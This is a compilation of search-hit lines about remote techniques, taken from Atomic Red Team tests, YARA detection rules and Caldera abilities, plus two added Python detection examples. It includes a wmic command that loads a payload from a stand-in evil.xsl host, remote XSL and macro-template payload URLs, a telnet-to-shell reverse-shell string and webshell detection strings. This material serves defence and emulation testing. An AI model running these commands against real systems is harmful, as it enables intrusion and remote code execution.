atomic-red-team T1218.011.md ## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1219.md # T1219 - Remote Access Software MIT License. © 2018 Red Canary
atomic-red-team T1219.md <blockquote>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) MIT License. © 2018 Red Canary
atomic-red-team T1219.md Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. MIT License. © 2018 Red Canary
atomic-red-team T1220.md Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft command line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019) MIT License. © 2018 Red Canary
atomic-red-team T1220.md Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its Regsvr32/ “Squiblydoo” counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) MIT License. © 2018 Red Canary
atomic-red-team T1220.md * Remote File: wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1220.md - Atomic Test #2 - MSXSL Bypass using remote files MIT License. © 2018 Red Canary
atomic-red-team T1220.md - Atomic Test #4 - WMIC bypass using remote XSL file MIT License. © 2018 Red Canary
atomic-red-team T1220.md ## Atomic Test #2 - MSXSL Bypass using remote files MIT License. © 2018 Red Canary
atomic-red-team T1220.md Executes the code specified within a XSL script tag during XSL transformation using a remote payload. MIT License. © 2018 Red Canary
atomic-red-team T1220.md | xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml| MIT License. © 2018 Red Canary
atomic-red-team T1220.md | xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl| MIT License. © 2018 Red Canary
atomic-red-team T1220.md ## Atomic Test #4 - WMIC bypass using remote XSL file MIT License. © 2018 Red Canary
atomic-red-team T1220.md Executes the code specified within an XSL script using a remote payload. Opens calc.exe when the test executes successfully (with AV disabled). MIT License. © 2018 Red Canary
atomic-red-team T1220.md | remote_xsl_file | Remote location of an XSL payload. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl| MIT License. © 2018 Red Canary
atomic-red-team T1221.md Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017) MIT License. © 2018 Red Canary
atomic-red-team T1221.md - Atomic Test #1 - WINWORD Remote Template Injection MIT License. © 2018 Red Canary
atomic-red-team T1221.md ## Atomic Test #1 - WINWORD Remote Template Injection MIT License. © 2018 Red Canary
atomic-red-team T1221.md Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm MIT License. © 2018 Red Canary
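Added example (not part of Atomic Red Team or the MITRE text quoted above): a Python check for the remote template reference that T1221 relies on and that the Template Injection variant of T1187 uses to trigger an SMB request. Word records an attached template as an `attachedTemplate` relationship in `word/_rels/settings.xml.rels`; the scanner opens the .docx as a zip, walks every `.rels` part and reports attached-template targets that are UNC paths or URLs while ignoring the normal local `file:///C:\...` Normal.dotm reference. The .docx it inspects is constructed in memory so the script runs offline; the target names and the minimal package layout are illustrative, not a Word-generated file.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Optional
from xml.sax.saxutils import quoteattr

# Relationship type Word uses for an attached (.dotm/.dotx) template.
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Targets that leave the host: UNC paths (which also force SMB authentication,
# T1187), http(s) URLs, and file:// URIs whose authority is not a local drive.
REMOTE_TARGET = re.compile(r"^(\\\\|//|https?://|file://(?!/*[A-Za-z]:))", re.IGNORECASE)


def find_remote_templates(docx_bytes: bytes) -> list:
    """Return each attachedTemplate relationship in the package whose Target is remote."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
                    hits.append({"part": name, "id": rel.get("Id"), "target": target})
    return hits


def build_docx(template_target: Optional[str]) -> bytes:
    """Constructed sample: the smallest OOXML package that carries a template reference.

    Not a Word-generated file; it only contains the parts the scanner inspects.
    """
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '</Types>'
    )
    settings_rels = '<Relationships xmlns="%s">' % RELS_NS
    settings_xml = ('<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">')
    if template_target is not None:
        settings_rels += ('<Relationship Id="rId1" Type="%s" Target=%s TargetMode="External"/>'
                          % (ATTACHED_TEMPLATE, quoteattr(template_target)))
        settings_xml += '<w:attachedTemplate r:id="rId1"/>'
    settings_rels += "</Relationships>"
    settings_xml += "</w:settings>"

    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/settings.xml", settings_xml)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return out.getvalue()


if __name__ == "__main__":
    # Illustrative targets: a UNC share (SMB coercion), an https URL, a benign local template.
    for target in (r"\\10.0.0.5\share\Normal.dotm",
                   "https://example.invalid/opencalc.dotm",
                   r"file:///C:\Users\u\AppData\Roaming\Microsoft\Templates\Normal.dotm",
                   None):
        print(repr(target), "->", find_remote_templates(build_docx(target)))
```

The same walk over `.rels` parts catches remote targets of other relationship types (linked OLE objects, external images) if the `Type` filter is widened; it is kept narrow here so the output maps directly onto the technique described.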
atomic-red-team T1485.md <blockquote>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk’s logical structure. MIT License. © 2018 Red Canary
atomic-red-team T1486.md <blockquote>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) MIT License. © 2018 Red Canary
atomic-red-team T1529.md <blockquote>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. MIT License. © 2018 Red Canary
atomic-red-team T1546.008.md Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as “sticky keys”, and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) MIT License. © 2018 Red Canary
atomic-red-team T1546.008.md For simple binary replacement on Windows XP and later as well as Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with “cmd.exe” (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures “cmd.exe,” or another program that provides backdoor access, as a “debugger” for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the “debugger” program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1550.002.md When performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. MIT License. © 2018 Red Canary
atomic-red-team T1550.003.md <blockquote>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system. MIT License. © 2018 Red Canary
atomic-red-team T1550.003.md Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local). MIT License. © 2018 Red Canary
atomic-red-team T1550.003.md PsExec is used to execute commands on the remote system, and the “C$” admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met. MIT License. © 2018 Red Canary
atomic-red-team T1550.003.md | target | Remote system to request the TGT from | string | localhost| MIT License. © 2018 Red Canary
atomic-red-team T1552.001.md <blockquote>Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. MIT License. © 2018 Red Canary
atomic-red-team T1552.004.md Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on *nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email. MIT License. © 2018 Red Canary
atomic-red-team T1552.004.md - Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote MIT License. © 2018 Red Canary
atomic-red-team T1552.004.md ## Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote MIT License. © 2018 Red Canary
atomic-red-team T1562.004.md netsh advfirewall firewall set rule group="remote desktop" new enable=Yes MIT License. © 2018 Red Canary
atomic-red-team T1563.002.md <blockquote>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) MIT License. © 2018 Red Canary
atomic-red-team T1563.002.md Adversaries may perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md - Atomic Test #2 - Use PsExec to execute a command on a remote host MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md ## Atomic Test #2 - Use PsExec to execute a command on a remote host MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md Will start a process on a remote host. MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default: localhost). MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md | remote_host | Remote hostname or IP address | String | localhost| MIT License. © 2018 Red Canary
atomic-red-team T1574.001.md There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) MIT License. © 2018 Red Canary
atomic-red-team T1609.md <blockquote>Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet) MIT License. © 2018 Red Canary
atomic-red-team T1609.md In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)</blockquote> MIT License. © 2018 Red Canary
signature-base airbnb_binaryalert.yar $a2 = "WS-Management is running on the remote host" wide ascii CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s2 = "What command do you want to run on the remote system? >" fullword ascii wide CC BY-NC 4.0
signature-base apt_alienspy_rat.yar description = "Alien Spy Remote Access Trojan" CC BY-NC 4.0
signature-base apt_apt29_nobelium_may21.yar description = "The FRESHFIRE malware family. The malware acts as a downloader, pulling down an encrypted snippet of code from a remote source, executing it, and deleting it from the remote server." CC BY-NC 4.0
signature-base apt_apt41.yar $s4 = "Remote Desktop Services" fullword wide CC BY-NC 4.0
signature-base apt_ar18_165a.yar description = "Hidden Cobra - Detects remote access trojan" CC BY-NC 4.0
signature-base apt_aus_parl_compromise.yar $s3 = "local -> remote {0} bytes" CC BY-NC 4.0
signature-base apt_aus_parl_compromise.yar $s4 = "remote -> local {0} bytes" CC BY-NC 4.0
signature-base apt_buckeye.yar description = "Detects a remote access tool used by APT groups - file RemoteCmd.exe" CC BY-NC 4.0
signature-base apt_deeppanda.yar $s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x1 = "* Failed to get remote TCP socket address" fullword wide CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii CC BY-NC 4.0
signature-base apt_fvey_shadowbroker_jan17.yar $a1 = "Getting remote time" fullword ascii CC BY-NC 4.0
signature-base apt_industroyer.yar $s2 = "return info-Remote command" fullword ascii CC BY-NC 4.0
signature-base apt_irontiger_trendmicro.yar description = "dllshellexc2010 Exchange backdoor + remote shell" CC BY-NC 4.0
signature-base apt_oilrig_chafer_mar18.yar $x2 = "Failed to notify rdp client process exit (MyrtilleAppPool down?), remote session {0} ({1})" fullword wide CC BY-NC 4.0
signature-base apt_oilrig_chafer_mar18.yar $x3 = "Started rdp client process, remote session {0}" fullword wide CC BY-NC 4.0
signature-base apt_project_sauron_extras.yar $s2 = "Remote Security Engine" fullword wide CC BY-NC 4.0
signature-base apt_sofacy_xtunnel_bundestag.yar description = "Winexe tool for remote execution (also used by Sofacy group)" CC BY-NC 4.0
signature-base apt_terracotta.yar description = "Remote Access Tool used in APT Terracotta" CC BY-NC 4.0
signature-base apt_turla.yar $s4 = "File already exist on remote filesystem !" ascii fullword CC BY-NC 4.0
signature-base apt_turla_penquin.yar $ = "File already exist on remote filesystem !" ascii fullword CC BY-NC 4.0
signature-base apt_unc2546_dewmode.yar $s4 = "include \"remote.inc\";" ascii CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s0 = "print \"[*] Connected to remote host \n\"; " fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_cn_group_btc.yar description = "Detects Ammyy remote access tool" CC BY-NC 4.0
signature-base crime_cn_group_btc.yar $s1 = "Please enter password for accessing remote computer" fullword ascii CC BY-NC 4.0
signature-base crime_ole_loadswf_cve_2018_4878.yar vuln_type = "Remote Code Execution" CC BY-NC 4.0
signature-base exploit_cve_2018_16858.yar reference = "https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html" CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s8 = "Connecting to Remote Server ...Failed" fullword ascii CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s3 = "Radmin, Remote Administrator" fullword wide CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s1 = "printf(\"Could not connect to remote shell!\n\");" fullword ascii CC BY-NC 4.0
signature-base gen_empire.yar $s5 = "Remote URL to your own WARFile to deploy." fullword ascii CC BY-NC 4.0
signature-base gen_empire.yar $s2 = "remote DLL injection" ascii CC BY-NC 4.0
signature-base gen_fireeye_redteam_tools.yar $str5 = "remote WIM image" ascii nocase wide CC BY-NC 4.0
signature-base gen_malware_set_qa.yar $s4 = "I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!" fullword ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x1 = "Throw \"Unable to allocate memory in the remote process for shellcode\"" fullword ascii CC BY-NC 4.0
signature-base gen_rats_malwareconfig.yar maltype = "Remote Access Trojan" CC BY-NC 4.0
signature-base gen_suspicious_strings.yar $fp2 = "Remote Desktop in the Appveyor" CC BY-NC 4.0
signature-base gen_url_persitence.yar description = "Detects remote SMB path for .URL persistence" CC BY-NC 4.0
signature-base gen_winshells.yar $s3 = "get - download file" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s4 = "[ simple remote shell for windows v3" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s6 = "put - upload file" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s7 = "term - terminate remote client" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s2 = "[ simple remote shell for windows v1" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s4 = "[ simple remote shell for windows v4" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s2 = "get - download file" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s3 = "REMOTE: CreateFile(\"%s\")" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s4 = "put - upload file" fullword ascii CC BY-NC 4.0
signature-base gen_winshells.yar $s5 = "term - terminate remote client" fullword ascii CC BY-NC 4.0
signature-base gen_xtreme_rat.yar $s2 = "Remote Service Application" fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $r = "Cannot query LSA Secret on remote host" CC BY-NC 4.0
signature-base thor-hacktools.yar $s = "Cannot write to process memory on remote host" CC BY-NC 4.0
signature-base thor-hacktools.yar $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s1 = "c:\\>nbtdump remote-machine" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe" CC BY-NC 4.0
signature-base thor-hacktools.yar $x5 = "Please enter password for accessing remote computer" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s0 = "Connection closed by remote host" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = "Remote connection closed by signal SIG%s %s" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s9 = "Remote host closed connection" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $x2 = "fgexec Remote Process Execution Tool" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $x4 = "Couldn't delete target executable from remote machine: %d" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar Identifier: BeyondExec Remote Access Tool CC BY-NC 4.0
signature-base thor-hacktools.yar description = "Detects BeyondExec Remote Access Tool - file rexesvr.exe" CC BY-NC 4.0
signature-base thor-hacktools.yar $ = "Radmin, Remote Administrator" wide CC BY-NC 4.0
signature-base thor-hacktools.yar $x1 = "Error injecting remote thread in process:" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar description = "Detects remote access tool PAEXec (like PsExec) - file PAExec.exe" CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = "\"<h2>Remote Control »</h2><input class=\"bt\" onclick=\"var" CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = "Remote Explorer CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = "News Remote PHP Shell Injection" CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = "print \"Asmodeus Perl Remote Shell CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = "* as email attachment, or send to a remote ftp server by" fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = "=====Remote Shell Closed=====" CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = "connect failed,check your network and remote ip." CC BY-NC 4.0
signature-base thor_inverse_matches.yar description = "Sethc.exe has been replaced - Indicates Remote Access Hack RDP" CC BY-NC 4.0
signature-base thor_inverse_matches.yar description = "Detects a renamed remote access tool PAEXec (like PsExec)" CC BY-NC 4.0
signature-base vul_cve_2020_0688.yar reference = "https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys" CC BY-NC 4.0
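Added example, not code from signature-base: the string lines above carry the modifiers `ascii`, `wide`, `fullword` and `nocase`, and the rules combine them with conditions such as `2 of them`. The Python below reimplements just those semantics so the behaviour is visible without a YARA install: `wide` matches the UTF-16LE form (so the `fullword wide` string from apt_apt41.yar does not fire on an ASCII "Remote Desktop Services"), and `fullword` rejects a hit that is glued to an alphanumeric character on either side. The sample buffer is constructed here, carrying strings taken from the gen_winshells and gen_xtreme_rat lines; it is not a real binary. For production scanning use yara or yara-python, which implement far more than this.

```python
import re

ALNUM = rb"[A-Za-z0-9]"

# Constructed sample buffer: ASCII help text like the "simple remote shell" family,
# one UTF-16LE service name, and a near-miss ("remotes") for the fullword check.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"[ simple remote shell for windows v3\r\n"
    + b"term - terminate remote client\r\n"
    + b"remotes are not matched as the word remote\r\n"
    + "Remote Service Application".encode("utf-16-le") + b"\x00\x00"
    + b"Remote Desktop Services\x00"
)

# Strings lifted from the gen_winshells.yar lines above, keyed by their identifiers.
WINSHELL_STRINGS = {
    "$s4": ("[ simple remote shell for windows v3", {"fullword": True}),
    "$s5": ('REMOTE: CreateFile("%s")', {"fullword": True}),
    "$s7": ("term - terminate remote client", {"fullword": True}),
}


def _needle(pattern: str, wide: bool) -> bytes:
    """`wide` strings are matched as UTF-16LE, as YARA does; otherwise plain ASCII."""
    return pattern.encode("utf-16-le") if wide else pattern.encode("ascii")


def find_string(buf: bytes, pattern: str, ascii: bool = True, wide: bool = False,
                fullword: bool = False, nocase: bool = False):
    """Offsets at which `pattern` occurs in `buf` under YARA-like modifiers.

    Returns a list of (encoding, offset) tuples. `ascii` and `wide` may both be
    set, exactly like writing `ascii wide` on a YARA string.
    """
    hits = []
    for kind in ("ascii", "wide"):
        if (kind == "ascii" and not ascii) or (kind == "wide" and not wide):
            continue
        needle = re.escape(_needle(pattern, kind == "wide"))
        if fullword:
            # fullword: no alphanumeric character directly before or after the
            # match. For wide strings every character occupies two bytes.
            bound = ALNUM if kind == "ascii" else ALNUM + rb"\x00"
            needle = rb"(?<!" + bound + rb")" + needle + rb"(?!" + bound + rb")"
        flags = re.IGNORECASE if nocase else 0
        hits.extend((kind, m.start()) for m in re.finditer(needle, buf, flags))
    return hits


def evaluate_rule(buf: bytes, strings: dict, required="any"):
    """Evaluate `any of them`, `all of them` or `N of them` over a rule's strings.

    `strings` maps a YARA-style identifier ($s1, ...) to (pattern, modifiers).
    Returns (condition_satisfied, {identifier: [hits]}) for the strings that matched.
    """
    matched = {ident: find_string(buf, pat, **mods) for ident, (pat, mods) in strings.items()}
    matched = {ident: hits for ident, hits in matched.items() if hits}
    if required == "any":
        needed = 1
    elif required == "all":
        needed = len(strings)
    else:
        needed = int(required)
    return len(matched) >= needed, matched


if __name__ == "__main__":
    print("gen_xtreme_rat $s2 (fullword wide):",
          find_string(SAMPLE, "Remote Service Application", ascii=False, wide=True, fullword=True))
    print("apt_apt41 $s4 (fullword wide) on an ASCII-only occurrence:",
          find_string(SAMPLE, "Remote Desktop Services", ascii=False, wide=True, fullword=True))
    print("'remote' fullword:", len(find_string(SAMPLE, "remote", fullword=True)),
          "loose:", len(find_string(SAMPLE, "remote")))
    print("gen_winshells, 2 of them:", evaluate_rule(SAMPLE, WINSHELL_STRINGS, required=2))
```

The `fullword` and `wide` distinctions are the usual reasons a hand-ported indicator silently fails to match: a UTF-16 service name in a PE resource is invisible to an `ascii`-only string, and `fullword` on a short token such as `remote` is what keeps the rule from firing on every word that merely contains it.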
stockpile 02de522f-7e0a-4544-8afc-0c195f400f5f.yml - source: remote.ssh.cmd Apache-2.0
stockpile 89955f55-529d-4d58-bed4-fed9e42515ec.yml curl #{remote.host.socket} Apache-2.0
stockpile 422526ec-27e9-429a-995b-c686a29561a4.yml - source: remote.ssh.cmd Apache-2.0
stockpile 422526ec-27e9-429a-995b-c686a29561a4.yml - source: remote.ssh.cmd Apache-2.0
stockpile 0360ede1-3c28-48d3-a6ef-6e98f562c5af.yml name: Remote System Discovery Apache-2.0
stockpile 13379ae1-d20e-4162-91f8-320d78a35e7f.yml name: Remote System Discovery Apache-2.0
stockpile 13379ae1-d20e-4162-91f8-320d78a35e7f.yml - source: remote.host.fqdn Apache-2.0
stockpile 26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml description: Identify the remote domain controllers Apache-2.0
stockpile 26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml name: Remote System Discovery Apache-2.0
stockpile 2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml description: Use PowerView to query the Active Directory server to determine remote admins Apache-2.0
